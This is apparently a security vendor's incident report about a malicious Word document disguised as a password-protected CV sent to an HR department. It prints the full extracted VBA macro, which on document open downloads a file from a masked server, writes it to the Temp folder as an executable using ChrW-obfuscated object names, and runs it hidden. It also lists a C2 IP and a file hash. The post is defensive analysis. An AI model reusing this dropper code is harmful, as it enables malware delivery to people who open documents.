February 21, 2019

Incident Report: CV or Cyber Vector?

In this post we discuss how a cyber attack involving malicious macro code was disguised as a CV delivered via email.

Perception Point Incident Response

Malicious Activity: Would You Hire a Hacker?

Would you? One of our client’s HR department received an email containing a CV. The email stated that the attached word document is password protected and provided the password inside the email. The user has to enter the password manually, a process that can cause issues to an automated system that check the file for malicious activity.

After the user enters the password the file becomes a common attack of a malicious macro code that executes malicious commands. The macro code is also encrypted making the detection even harder.

Perception Point’s file decryption feature that extracts the malicious code from an encrypted file. The code downloads a malicious exe to the temp folder from a server and activates it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
WinHttpReq.send
Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5
xyuhjnx = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Open
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    
    Dim first6 As String
    Dim last6 As String
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
    oStream.Close
    
End If
 
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub

IOC’s

C2 Server IP - 209.141.55.226
qwerty2.exe - 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (SHA-256) VT score 12/69 2019-02-21 15:13:33 UTC

Learn more about how we protect our clients against malicious activity here.

Learn more about protecting your organization in our detailed guide to cyber security strategy.

Download the 2023 Gartner Market Guide for Email Security

TALK TO SALES

Ready to Try
Perception Point?

Learn More

Stealing More Than Towels: The New InfoStealer Campaign Hitting Hotels and Travel Agencies

Perception Point researchers discover new InfoStealer malware campaign targeting the hospitality industry.

BEC Attack Roundup: Thread Hijack Edition

In this blog we look at real-life examples of thread hijacks that could have cost our customers over $1,951,000!

QR Code Red: Quishing Attacks and How to Prevent Them

Learn how cybercriminals exploit QR codes to deliver advanced phishing, or “quishing,” attacks and how Perception Point is stopping them.

Investigating the Intricacies of BEC Invoice Redirect Attacks

In this blog, we analyze the complexities of invoice redirect attacks by breaking down real life attack examples.

How to Conduct a Phishing Attack in a 5 Easy Steps

Phishing is cybercrime’s oldest threat and it continues to be one of the most trending attacks on individuals and organizations alike. In this blog post we discuss recent players on the cyberattack scene: script kiddies, and their methods that make phishing so easy, even for the inexperienced.

Takeaways From Perception Point’s “H1 2023 Report: Cybersecurity Trends & Insights”

In this blog post, we review the main takeaways from Perception Point’s “H1 2023: Cybersecurity Trends & Insights.”